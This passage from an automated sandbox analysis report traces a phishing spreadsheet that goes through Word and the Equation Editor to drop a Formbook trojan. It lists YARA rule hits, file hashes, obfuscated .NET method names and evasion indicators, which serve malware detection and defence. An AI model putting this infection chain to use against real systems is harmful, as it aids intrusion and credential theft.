              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008EFBD79_2_008EFBD7
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00917B009_2_00917B00
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0098FDDD9_2_0098FDDD
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0097BF149_2_0097BF14
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0091DF7C9_2_0091DF7C
              Source: RFQ#51281AOLAI.xlsOLE indicator, VBA macros: true
              Source: ~DF6D5A74146301A5A1.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: ~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe 434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\winiti.exe 434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 008EE2A8 appears 60 times
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 0095F970 appears 84 times
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 0093373B appears 253 times
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 00933F92 appears 132 times
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 008EDF5C appears 137 times
              Source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFE27256.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
              Source: winiti[1].exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: winiti.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 8.2.winiti.exe.590000.0.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 8.2.winiti.exe.590000.0.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 8.2.winiti.exe.289505c.4.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 8.2.winiti.exe.289505c.4.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@7/25@6/3
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\07330000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMutant created: NULL
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR77FC.tmpJump to behavior
              Source: RFQ#51281AOLAI.xlsOLE indicator, Workbook stream: true
              Source: 07330000.0.drOLE indicator, Workbook stream: true
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64cpu.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: RFQ#51281AOLAI.xlsStatic file information: File size 1155083 > 1048576
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: amWV.pdb source: winiti.exe, 00000008.00000000.412497282.0000000001382000.00000020.00000001.01000000.00000005.sdmp, winiti[1].exe.7.dr, winiti.exe.7.dr
              Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000008.00000000.412497282.0000000001382000.00000020.00000001.01000000.00000005.sdmp, winiti[1].exe.7.dr, winiti.exe.7.dr
              Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
              Source: 07330000.0.drInitial sample: OLE indicators vbamacros = False
              Source: RFQ#51281AOLAI.xlsInitial sample: OLE indicators encrypted = True

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 8.2.winiti.exe.590000.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 8.2.winiti.exe.289505c.4.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              .NET source code contains potential unpacker
              Source: winiti[1].exe.7.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
              Source: winiti.exe.7.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00401420 push es; retn 00F1h9_2_004014F8
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041F0DC push es; retf 9_2_0041F0E6
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00412104 pushad ; ret 9_2_0041212D
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040C1EA push edx; retf 9_2_0040C1EE
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00403260 push eax; ret 9_2_00403262
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00426263 push edi; iretd 9_2_0042626E
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00408271 push es; ret 9_2_00408272
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00413A0B push esi; retf 9_2_00413A0E
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00418A13 push ds; retf 2ECDh9_2_00418BEE
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00418355 push ebp; retf 9_2_004183DC
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00418BA5 push ebx; iretd 9_2_00418BA6
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041E653 push ds; iretd 9_2_0041E654
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041E63B push ebx; iretd 9_2_0041E64C
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004187CA push ebp; ret 9_2_004187CB
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008EDFA1 push ecx; ret 9_2_008EDFB4
              Source: winiti[1].exe.7.drStatic PE information: section name: .text entropy: 7.760978166314589
              Source: winiti.exe.7.drStatic PE information: section name: .text entropy: 7.760978166314589
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, zDIByBvZeeoTUlBtuI.csHigh entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, QpyfwtBfq1mip1rA69.csHigh entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, iIG0lTjpxEHhOQvkFer.csHigh entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, g3uWXYxFNrFgfAVMbg.csHigh entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, SM8r4X8fVbB7QJOWqS.csHigh entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, raIl7X21rhHoQ1rmtr.csHigh entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, lcS7RE1vxlKWGpOeGp.csHigh entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, xFiqCjOS4mObwnqG7R.csHigh entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, Y56XpTEtPmCWtAUcx3.csHigh entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, LQj0kcVZN6Kkvud9DR.csHigh entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, bwrRjVyKj1VL5wCXv7.csHigh entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, H5DbcuXYjlGQPm0xJ0.csHigh entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, IcQdK2rXYfyvqYcyHa.csHigh entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, QoOP4PjGKS5gfhE57SM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, qKgcIJaPN5xDIttQpD.csHigh entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, hNFj00Hv45CTOkfqEI.csHigh entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, Q8PlVd7gMYjm0S8vYt.csHigh entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, OOABLIblxanx4dA8KG.csHigh entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, f3eVc2kPtPvNgZNKDL.csHigh entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, XC3FVVqBJrFXgahDpX.csHigh entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'
              Source: 8.2.winiti.exe.590000.0.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
              Source: 8.2.winiti.exe.590000.0.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
              Source: 8.2.winiti.exe.289505c.4.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
              Source: 8.2.winiti.exe.289505c.4.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, zDIByBvZeeoTUlBtuI.csHigh entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, QpyfwtBfq1mip1rA69.csHigh entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, iIG0lTjpxEHhOQvkFer.csHigh entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, g3uWXYxFNrFgfAVMbg.csHigh entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, SM8r4X8fVbB7QJOWqS.csHigh entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, raIl7X21rhHoQ1rmtr.csHigh entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
